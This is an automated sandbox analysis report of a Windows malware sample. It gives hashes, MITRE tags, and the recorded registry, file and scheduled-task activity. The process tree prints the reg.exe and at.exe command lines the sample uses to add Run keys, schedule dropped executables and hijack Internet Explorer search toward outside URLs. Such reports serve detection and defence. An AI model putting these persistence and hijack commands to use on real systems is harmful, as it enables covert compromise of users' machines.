b1f091fde258103951157138a8290ea701496e67533e8365f65a2f7010507e16

Analysis

max time kernel
90s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
13/12/2024, 05:56

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

ea35688c3b4e97ec431e76990e1a5dd7_JaffaCakes118.exe
Size

969KB
MD5

ea35688c3b4e97ec431e76990e1a5dd7
SHA1

ff461480c5b3988c61402def5b63b550c24191b1
SHA256

b1f091fde258103951157138a8290ea701496e67533e8365f65a2f7010507e16
SHA512

887503d47b0172c6148fedb6e73ca77005d4344b2a7575ec7263fd17c5805d6bb01f23671f718b613d3e765e518e357a6fcae04b39e448e28393434184235d58
SSDEEP

24576:IjTBqNfbDLIEgMsuo6Fuajhz9iA018my9yp1QrdQgAsC:rNDDLIEUGFuaj1sA0xIOQpDk

Score

8^/10

discovery persistence upx

Malware Config

Signatures

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	cmd.exe

Executes dropped EXE 3 IoCs

pid	Process
3528	z.exe
380	menu.exe
4824	pin.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce\360safetray = "\"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\internat.exe\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\internat = "\"C:\\Windows\\repair\\internat.exe\""	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce\360safe = "\"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\360tray.exe\""	reg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\WinUpdate.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\WinUpdate.exe	cmd.exe
File created	C:\Windows\SysWOW64\pin.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\pin.exe	cmd.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023b7b-9.dat	upx
behavioral2/files/0x000d000000023b26-12.dat	upx
behavioral2/memory/380-20-0x0000000000400000-0x000000000041B000-memory.dmp	upx
behavioral2/memory/4824-26-0x0000000000400000-0x0000000000417000-memory.dmp	upx
behavioral2/memory/380-140-0x0000000000400000-0x000000000041B000-memory.dmp	upx
behavioral2/memory/4824-234-0x0000000000400000-0x0000000000417000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Internet Explorer\SIGNUP\360tray.exe	cmd.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\SIGNUP\360tray.exe	cmd.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\repair\internat.exe	cmd.exe
File created	C:\Windows\internet.exe	cmd.exe
File opened for modification	C:\Windows\internet.exe	cmd.exe
File created	C:\Windows\win32.exe	cmd.exe
File opened for modification	C:\Windows\win32.exe	cmd.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4872	3528	WerFault.exe	85

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	menu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	at.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ea35688c3b4e97ec431e76990e1a5dd7_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4904	PING.EXE

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}\MenuText = "FLASH▓Ñ╖┼╞≈"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}\hotIcon = "C:\\Windows\\System32\\shell32.dll,47"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}\ButtonText = "▓╞╛¡╞╡╡└"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}\Icon = "C:\\Windows\\System32\\shell32.dll,47"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}\MenuStatusBar = "FLASH▓Ñ╖┼╞≈"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}\Default Icon = "C:\\Windows\\System32\\shell32.dll,47"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Search	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}\Default Visible = "yes"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}\MenuStatusBar = "╙╬╧╖╡╪┤°"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}\CLSID = "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}\Exec = "http://www.biso.cn/js/re.asp?i=1"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}\hotIcon = "C:\\Windows\\System32\\shell32.dll,15"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}\Default Icon = "C:\\Windows\\System32\\shell32.dll,26"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Internet Explorer\MenuExt\Google ╚½─▄╦╤╦≈	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}\ClsidExtension = "╨┬╬┼╫╩╤╢"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}\ButtonText = "│ú╙├╚φ╝■"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}\hotIcon = "C:\\Windows\\System32\\shell32.dll,28"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Search\CustomizeSearch = "http://www.biso.cn/google.asp"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}\CLSID = "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}\hotIcon = "C:\\Windows\\System32\\shell32.dll,26"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\MenuExt\Google ╚½─▄╦╤╦≈\ = "http://www.biso.cn/js/menu.asp?menu=search"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}\Default Visible = "yes"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}\MenuStatusBar = "▒Ω╫╝╦╤╦≈"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}\CLSID = "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}\	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Internet Explorer\MenuExt\China-World ╥¬╬┼	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}\Default Visible = "yes"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}\ClsidExtension = "FLASH▓Ñ╖┼╞≈╧┬╘╪"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}\Default Icon = "C:\\Windows\\System32\\shell32.dll,40"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}\ButtonText = "FLASH▓Ñ╖┼╞≈╧┬╘╪"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}\Default Visible = "yes"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}\MenuText = "╣·─┌╣·╝╩╨┬╬┼"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4904	PING.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2584 wrote to memory of 1968	2584	ea35688c3b4e97ec431e76990e1a5dd7_JaffaCakes118.exe	83
PID 2584 wrote to memory of 1968	2584	ea35688c3b4e97ec431e76990e1a5dd7_JaffaCakes118.exe	83
PID 2584 wrote to memory of 1968	2584	ea35688c3b4e97ec431e76990e1a5dd7_JaffaCakes118.exe	83
PID 1968 wrote to memory of 3528	1968	cmd.exe	85
PID 1968 wrote to memory of 3528	1968	cmd.exe	85
PID 1968 wrote to memory of 3528	1968	cmd.exe	85
PID 1968 wrote to memory of 380	1968	cmd.exe	86
PID 1968 wrote to memory of 380	1968	cmd.exe	86
PID 1968 wrote to memory of 380	1968	cmd.exe	86
PID 1968 wrote to memory of 4824	1968	cmd.exe	87
PID 1968 wrote to memory of 4824	1968	cmd.exe	87
PID 1968 wrote to memory of 4824	1968	cmd.exe	87
PID 380 wrote to memory of 4060	380	menu.exe	88
PID 380 wrote to memory of 4060	380	menu.exe	88
PID 380 wrote to memory of 4060	380	menu.exe	88
PID 4824 wrote to memory of 2844	4824	pin.exe	90
PID 4824 wrote to memory of 2844	4824	pin.exe	90
PID 4824 wrote to memory of 2844	4824	pin.exe	90
PID 2844 wrote to memory of 4904	2844	cmd.exe	94
PID 2844 wrote to memory of 4904	2844	cmd.exe	94
PID 2844 wrote to memory of 4904	2844	cmd.exe	94
PID 4060 wrote to memory of 5068	4060	cmd.exe	95
PID 4060 wrote to memory of 5068	4060	cmd.exe	95
PID 4060 wrote to memory of 5068	4060	cmd.exe	95
PID 4060 wrote to memory of 2484	4060	cmd.exe	96
PID 4060 wrote to memory of 2484	4060	cmd.exe	96
PID 4060 wrote to memory of 2484	4060	cmd.exe	96
PID 4060 wrote to memory of 2424	4060	cmd.exe	97
PID 4060 wrote to memory of 2424	4060	cmd.exe	97
PID 4060 wrote to memory of 2424	4060	cmd.exe	97
PID 4060 wrote to memory of 868	4060	cmd.exe	99
PID 4060 wrote to memory of 868	4060	cmd.exe	99
PID 4060 wrote to memory of 868	4060	cmd.exe	99
PID 4060 wrote to memory of 768	4060	cmd.exe	100
PID 4060 wrote to memory of 768	4060	cmd.exe	100
PID 4060 wrote to memory of 768	4060	cmd.exe	100
PID 4060 wrote to memory of 4384	4060	cmd.exe	101
PID 4060 wrote to memory of 4384	4060	cmd.exe	101
PID 4060 wrote to memory of 4384	4060	cmd.exe	101
PID 4060 wrote to memory of 3656	4060	cmd.exe	102
PID 4060 wrote to memory of 3656	4060	cmd.exe	102
PID 4060 wrote to memory of 3656	4060	cmd.exe	102
PID 4060 wrote to memory of 784	4060	cmd.exe	103
PID 4060 wrote to memory of 784	4060	cmd.exe	103
PID 4060 wrote to memory of 784	4060	cmd.exe	103
PID 4060 wrote to memory of 3076	4060	cmd.exe	104
PID 4060 wrote to memory of 3076	4060	cmd.exe	104
PID 4060 wrote to memory of 3076	4060	cmd.exe	104
PID 4060 wrote to memory of 1684	4060	cmd.exe	105
PID 4060 wrote to memory of 1684	4060	cmd.exe	105
PID 4060 wrote to memory of 1684	4060	cmd.exe	105
PID 4060 wrote to memory of 3496	4060	cmd.exe	106
PID 4060 wrote to memory of 3496	4060	cmd.exe	106
PID 4060 wrote to memory of 3496	4060	cmd.exe	106
PID 4060 wrote to memory of 1028	4060	cmd.exe	107
PID 4060 wrote to memory of 1028	4060	cmd.exe	107
PID 4060 wrote to memory of 1028	4060	cmd.exe	107
PID 4060 wrote to memory of 2836	4060	cmd.exe	108
PID 4060 wrote to memory of 2836	4060	cmd.exe	108
PID 4060 wrote to memory of 2836	4060	cmd.exe	108
PID 4060 wrote to memory of 1848	4060	cmd.exe	109
PID 4060 wrote to memory of 1848	4060	cmd.exe	109
PID 4060 wrote to memory of 1848	4060	cmd.exe	109
PID 4060 wrote to memory of 3616	4060	cmd.exe	110

C:\Users\Admin\AppData\Local\Temp\ea35688c3b4e97ec431e76990e1a5dd7_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\ea35688c3b4e97ec431e76990e1a5dd7_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2584
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\z.bat""
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1968
- - C:\Users\Admin\AppData\Local\Temp\step$rewer2\z.exe
    step$rewer2\z.exe
    3⤵
    - Executes dropped EXE
    PID:3528
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3528 -s 616
      4⤵
      Program crash
      PID:4872
- - C:\Users\Admin\AppData\Local\Temp\step$rewer2\menu.exe
    step$rewer2\menu.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:380
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\menu.bat""
      4⤵
      Drops file in System32 directory
      Drops file in Program Files directory
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4060
    - - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /va /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5068
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce /v 360safetray /d """"C:\Program Files (x86)\Internet Explorer\SIGNUP\internat.exe"""" /f
        5⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:2484
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /v internat /d """"C:\Windows\repair\internat.exe"""" /f
        5⤵
        Adds Run key to start application
        
        PID:2424
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce /v 360safe /d """"C:\Program Files (x86)\Internet Explorer\SIGNUP\360tray.exe"""" /f
        5⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:868
    - - C:\Windows\SysWOW64\at.exe
        
        at /delete /yes
        5⤵
        
        PID:768
    - - C:\Windows\SysWOW64\at.exe
        
        AT 18:15 /every:T,TH,f,Sa,Su C:\Windows\SYSTEM32\WinUpdate.exe
        5⤵
        
        PID:4384
    - - C:\Windows\SysWOW64\at.exe
        
        AT 04:00 C:\Windows\SYSTEM32\pin.exe
        5⤵
        System Location Discovery: System Language Discovery
